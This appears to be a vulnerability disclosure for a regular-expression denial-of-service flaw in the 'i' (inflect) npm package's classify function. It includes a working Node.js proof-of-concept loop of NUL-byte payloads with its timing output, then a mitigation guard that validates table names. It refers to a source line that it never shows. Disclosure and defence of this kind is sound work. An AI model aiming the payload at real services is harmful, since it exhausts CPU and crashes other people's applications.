The inflect package is vulnerable to ReDoS (regular expression denial of service). An attacker who can supply a crafted table_name as input to the classify function may cause an application to consume an excessive amount of CPU.
The pinned source line below uses the vulnerable regular expression.
Put the code below in a poc.js file and run it with node.
//poc.js
var inflect = require('i')();
for (var i = 1; i <= 500; i++) {
  var time = Date.now();
  // Input grows by 10000 NUL bytes per iteration
  var payload = "" + "\u0000".repeat(i * 10000) + "\u0000";
  inflect.classify(payload);
  var time_cost = Date.now() - time;
  console.log("Classify time : " + payload.length + ": " + time_cost + " ms");
}
Check the output:
Classify time : 10001: 158 ms
Classify time : 20001: 565 ms
Classify time : 30001: 1282 ms
Classify time : 40001: 2129 ms
Classify time : 50001: 3369 ms
Classify time : 60001: 8430 ms
Classify time : 70001: 15926 ms
Classify time : 80001: 16221 ms
This vulnerability can exhaust system resources and lead to crashes.
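As an added mitigation example (not part of the original report), the guard below rejects oversized or non-identifier table_name values before they reach inflect.classify(), so input such as the NUL payload above never touches the vulnerable regex. The 128-character bound, the allowlist pattern and the demoClassify stand-in are assumptions for illustration.

```javascript
// Added example, not from the original report: validate table_name before it is
// handed to inflect.classify(), so crafted strings never reach the vulnerable regex.
// The 128-character bound and the identifier allowlist are assumptions; adjust them
// to the real naming rules of the application.
const MAX_TABLE_NAME_LENGTH = 128;
// Anchored, single-quantifier pattern: runs in linear time and rejects NUL bytes.
const TABLE_NAME_PATTERN = /^[A-Za-z][A-Za-z0-9_]*$/;

// Returns classifyFn(tableName) for acceptable input, otherwise null.
// classifyFn is injected (e.g. require('i')().classify) so the guard can be
// exercised here without the package installed.
function safeClassify(tableName, classifyFn) {
  if (typeof tableName !== 'string') return null;
  if (tableName.length > MAX_TABLE_NAME_LENGTH) return null;
  if (!TABLE_NAME_PATTERN.test(tableName)) return null;
  return classifyFn(tableName);
}

// Runs a list of inputs through the guard and reports how many reached classifyFn.
function runGuard(inputs, classifyFn) {
  let reached = 0;
  const counting = (s) => { reached++; return classifyFn(s); };
  const results = inputs.map((s) => safeClassify(s, counting));
  return { results, reached };
}

// Stand-in for classify(): constructed for this example only, not inflect's logic.
const demoClassify = (s) =>
  s.split('_').map((w) => w[0].toUpperCase() + w.slice(1)).join('');

// Constructed inputs: two ordinary names, the NUL payload shape from the PoC,
// and a name that exceeds the length bound.
const SAMPLE_INPUTS = [
  'user_accounts',
  'orders',
  '\u0000'.repeat(10000) + '\u0000',
  'a'.repeat(MAX_TABLE_NAME_LENGTH + 1),
];

const guardReport = runGuard(SAMPLE_INPUTS, demoClassify);
console.log(guardReport.results, 'inputs that reached classify:', guardReport.reached);
```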